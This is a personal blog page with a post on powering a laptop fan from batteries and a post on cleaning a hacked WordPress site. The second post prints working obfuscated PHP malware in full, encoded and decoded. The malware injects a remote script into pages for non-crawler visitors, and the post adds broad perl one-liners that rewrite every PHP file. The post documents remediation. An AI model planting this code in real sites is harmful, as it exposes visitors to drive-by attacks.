Monday, May 17, 2010

Time-Pass Engineering

It was just a month passed after warranty of my Latitude laptop had expired and cpu fan stopped cooling processor of laptop. It was good i realised it before else laptop's processor would have melted some day. Very next day of this realisation i called up Dell customer care and asked for replacement of fan, customer care executive did some troubleshooting steps with diagnostic disc supplied with laptop and came to a conclusion that fan has to replaced. He promised me to send quotation for fan in few days. After some days i got an email saying that product(fan) is EOL, so they can't supply it anymore. I was not able to use my laptop just because of this, just because i was having another laptop given by office, it was not a trouble for me.

Some weeks later i opened my laptop and took out cpu fan out. my plan was to get it repaired with help of some electrical shop, meantime i got some information about some laptop repair shops. At one shop i was told that fan can't be repaired but they can get same fan within a week, but later after two weeks shopkeeper refused as he was not able to find one for me. I tried another shop he kept fan for three days and finally called back to me saying fan is working. He asked me to get motherboard and offered me to fix this. I was not willing to leave my machine at his shop and he refused to repair it in front of me. I got the fan back and thought to get it fixed later with someone else.

Once again i called up Dell and told them it not fan but the power connector of on the motherboard which is not supplying any power to fan. Last weekend i was not having any plans, and because of hot sun outside i don't wanted to got outside my room. I checked power requirement of the fan it was 5.0 volt. With an idea of checking it i bought three pencil cell battery each of 1.5 volt. With help of a thin wire i connected battery with the fan wires and finally i saw fan in working condition. Here i started my mind's engineering capability to fix the fan. 
I connected two wires to the power connector of the fan and made it pasted transparent tape on it so that it doesn't create any short-circuit with motherboard. then i found a place to keep two batteries in inside the laptop body. I could have done some more research on the motherboard to find a suitable point where i can get desired voltage for the fan  but unfortunately i was not having any multimeter kind of device to check the voltage coming out from various available points on the mother board and also. Then i though if i fix the fan directly to the batteries it will remain in always-on situation and batteries will die soon. Now i was thinking to purchase a small switch button to control the fan. Looking at the datacard panel on the board i started mechanical engineer portion of my mind. Have a look on the pictures next.
This picture above shows switch in off state


This Picture above shows switch in on state

If you observe carefully you will see a black plastic stick purpose of stick is too push out internet datacard which i don't use in my laptop as i have USB wireless modem. I pasted one wire to this stick and other wire to the iron plate with help of adhesive, this was most time taking task as it needs to be done with complete perfection finally switch is ready, all i have to do is pull the stick out to make circuit on and push it back to turn off the circuit.

Next i carefully fixed the batteries and aligned the wires so that they don't cause any hindrance while closing the laptop. I fitted back all the components carefully and was ready to boot up my machine.

Just to keep an eye on the fan's working i enabled temperature monitoring widget on my fedora desktop. though i dont find any option to raise a sound alert in this applet, may i have sit another weekend and look into code of this fedora desk widget to have an option of setting a sound alarm when temperature goes higher than a certain point.

Saturday, May 8, 2010

When WordPress Site was Hacked

Long time ago i opted to read news online avoiding wastage of newsprint and i bookmarked various news websites for reading news daily morning, and it became habit to checkout bookmarked websites early in the morning. Yesterday morning when i opened one of bookmarked website for news about himachal website was redirecting me to some interesting page, and this page was offering some exe for cleaning up virus from my computer. how funny .... site was saying me to clean virus from my linux laptop.. ha ha ha.. 

Investigating more about websites i found this was happening from the server side, i passed on a message to the website owner, as he was known to me, saying that something is breaking on his site. Later i got a call from website owner saying that some malicious code is added to each page on the webserver. Here is the code he has sent 
----code begins here----

<?php /**/ 
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z
dGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk
R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlz
dHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMo
J2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICgh
c3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdv
b2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VT
RVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFz
ZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5
NlpYUjBZWEJsZEhSaExtTnZiUzlxY3k1d2FIQWlQand2YzJOeWFY
QjBQZz09Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0g
ICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNv
ZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0
OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJB
QjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0
cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMs
MSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1
M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1
NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQw
NkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIx
OTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vi
c3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMs
MTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdB
NEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkx
RTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgx
Mjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3
QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMx
NDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRD
NEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRS
NUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDAp
LCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7
ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBB
NzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5Mzky
MjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3
NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQw
MzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAg
ICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1
RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1
QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5
Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIo
JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJF
NEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAg
aWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09
PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlB
MTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1
NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0
Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBm
dW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVC
QTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGlu
Zzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdC
NTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1
RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgn
L1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1
OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgn
LyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEn
LCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAg
ICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4
QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAg
b2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
----code ends here----
here is the expansion of decoded string 
----expansion starts here ----
:if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly96ZXR0YXBldHRhLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg=="); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }
----expansion ends here----

Well it will take some more time for me to understand this. later i was given shell access to this web server to check out the problem.. I used perl to remove this code from the php file ..

perl -p -i -e 's/.*=="\)\);\?>//g'

but this was not enough, website was giving errors even after this. It was hard time prior to this website was redirecting but now website was getting displayed without css, at this time i was more worried whole website was looking very ugly, I called up website owner and call was a relief for me, i was feeling owner might be unhappy with me for giving this ugly look to his website but his was calm which motivated me. Struggling some more with the php files for some other malicious code, I checked out error logs and found there was some problems in sending php headers, and i immediately remembered my college days when my php project stopped working because of one empty line was added in the login page. 

so i again executed following perl command to cleanup the empty lines.
perl -p -i -e 's/^\n//g'

and website was up again. 

here is the piece of code which can fix similar problem in one go, all you need to do is move to root directory of your webserver and execute

for i in `find ./* -name "*.php"`;do  if [ -f $i ];then perl -p -i -e 's/.*=="\)\);\?>[^.]*//g' $i ; perl -p -i -e 's/^\n//' $i ; fi done;

I have to use two regular expression as newline character was giving trouble to me. i would like to mention this expression will work for the above mentioned malicious code, you may have to tweek the expression if you have some other malicious code added to your word press site.

If you don't have shell access to webserver other solution to such problem can be updating wordpress, if you already have the latest version you get option of reinstalling wordpress which actually replaces all the affected php files and your affected php files with malicious code will be removed automatically. In case you you have custom theme you have to update your theme files also and also the plugins you are using in your wordpress site.

I am still confused how hacker was able to add this php code, as i dont have sudo access on the webserver could not get more things for you, will try to detect it somehow.. 

Happy Wordpress people.. Happy Open Source..